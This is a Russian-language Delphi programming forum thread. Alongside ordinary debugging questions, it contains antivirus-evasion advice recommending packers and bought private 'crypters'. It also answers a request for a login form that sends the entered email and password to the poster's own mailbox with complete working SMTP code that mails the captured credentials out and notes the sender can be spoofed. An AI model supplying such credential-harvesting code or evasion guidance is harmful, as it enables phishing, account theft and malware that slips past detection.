Code: if edit5.text < '5' then showmessage('Минимальное значение для таймера "5" сек.') else begin timer1.Interval:= strtoint(edit5.text + '000'); timer1.enabled:=true; edit5.ReadOnly:= true; end; вообщем есть edit1, нужно так, если значение от ноля до 5(не включительно) вывод сообщения, это все работает, при значениях от 5 до 9 все тоже ровно, а вот от 10 до 99 начинает выскакивать шоумеседж, почему? напарился уже ниче в голову не лезет, вроде пустяк такой... в свойсвах едитки макс. кол-во символов стоит 2
ну ты даешь, строки сравниваешь! if strtoint(edit5.text) < 5 then showmessage('Минимальное значение для таймера "5" сек.') else begin timer1.Interval:= strtoint(edit5.text) *1000; timer1.enabled:=true; edit5.ReadOnly:= true; end; что ты там дальше сказа я не очень понял, твоя основная проблема в том что ты путаешься в типах данных.
2 Пуховой, решил свою проблему? я в таких случаях использую флаги, вроде нормально робит. вообще правильно делать через симафоры или мьютексы. это если я тебя правильно понял, wolmer тоже что такое когдато спрашивал, не помню ответили ему или нет.
В DEPHI 7: Code: var s:string; pck:array [0..65534] of byte; pck2:array [0..65534] of byte; begin len:=recv(sock,pck,MAX_PKT_SIZE,0); move(pck[0],pck2[0],len); s:=''; s:=s+inttohex(pck2,2); memo1.lines.Add(s); в DELPHI 2009 этот же код выдаёт ошибку: E2250 There is no overloaded version of 'IntToHex' that can be called with these arguments как исправить?
Есть какие нибудь способы как спрятать файл от Антивирусников имея исходный код программы? Переименовывание форм, кнопок, процедур пойдет?
Оно, но не помогло сделать эти два шага, в RootDir мб что то поменять?. Все сменил по батнику с дельфи сайта. Но у меня не такая ошибка, у меня аккес виолатион!
Антивирусу плевать на кнопки и все остальное. Он смотрит только на функции. Для шифровки используй пакеры (есть такие, что маскируют от простеньких антивирусов). А вообще есть специальные программы, они называются крипторы. Но вся проблема в том, что те крипторы, которые в паблике, большинство антивирусов палят. Нужно либо искать нормальный паблик (если поднапрячься то можно), или купить приватный.
Как поставить пароль на кнопку, тоесть чтобы при нажатии на кнопку выскакивала форма с полем для ввода пароля, и при вводе правильного пароля выполнялась функция..???? Все на Делфи7
Добавь в проект новую форму, собственно где и будет поле ввода пароля, пропиши новый unit в секции uses первого юнита. Код кнопки на первой форме: Code: form1.button1click(sender: TObject); begin form1.enabled := false; form2.show; end; Во втором юните напиши проверку пароля и выполни нужную функцию. Code: // checkpass(pass: string): boolean - функция проверки пароля form2.button1click(sender: TObject); begin if checkpass(edit1.text) then MyFunction else showmessage('Неверный пароль'); end;
двe edit на форме: мыло, пасс. И что бы после ввода скидывало на аську ил хотябы на мыло введённые данные
Code: uses EncdDecd, WinSock2; procedure SendLetter(SMTPAddress: PChar; SMTPPort: Word; Login, Password, MailFrom, MailTo, Subject, BodyText: string); var wsa: TWSAData; sock: TSocket; sock_addr: TSockAddrIn; function get_ip(host: PChar): PChar; var host_ent: PHostEnt; begin host_ent := gethostbyname(host); Result := inet_ntoa(PInAddr(host_ent.h_addr_list^)^); end; procedure send_str(str: string); var i: Integer; begin str := str + #13#10; for i := 1 to Length(str) do send(sock, str[i], 1, 0); end; begin WSAStartup(WINSOCK_VERSION, wsa); sock := WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, nil, 0, 0); if sock = INVALID_SOCKET then Exit; sock_addr.sin_family := AF_INET; sock_addr.sin_port := htons(SMTPPort); sock_addr.sin_addr.s_addr := inet_addr(get_ip(SMTPAddress)); connect(sock, @sock_addr, SizeOf(sock_addr)); send_str('HELO SMTP'); send_str('AUTH LOGIN'); send_str(EncodeString(Login)); //логин в Base64 send_str(EncodeString(Password)); //пароль в Base64 send_str('MAIL FROM:<' + MailFrom + '>'); //мыло отправителя send_str('RCPT TO:<' + MailTo + '>'); //мыло получателя send_str('DATA'); send_str('from:' + MailFrom); //мыло отправителя (можно подменить) send_str('to:' + MailTo); //мыло получателя send_str('subject:' + Subject + #13#10); //тема письма send_str(BodyText); //текст письма send_str('.'); send_str('QUIT'); closesocket(sock); WSACleanUp; end; Использовать например так: Code: SendLetter( 'smtp.yandex.ru', 25, 'login', 'pass', '[email protected]', '[email protected]', 'Mail and Password', Edit1.Text + ' : ' + Edit2.Text );
блин так я и не понял ничего Подскажите вот есть два окна для ввода мыла и пасса к нему Внизу кнопка отправить Как сделать что бы мыла с пассами шли на мой emeil??? мыло на майле Подскажите плиз по подробнее к каждому окну Да и ещё куда вводить своё мыло с пассом с которого будет идти отправка
"Подскажите вот есть два окна для ввода мыла и пасса к нему" - это у твоей программы или у чужой? Если у твоей, то на вопрос твой уже ответили вполне понятно. А вот четвертый абзац я вообще не понял... Можешь еще раз попонятней сформулировать?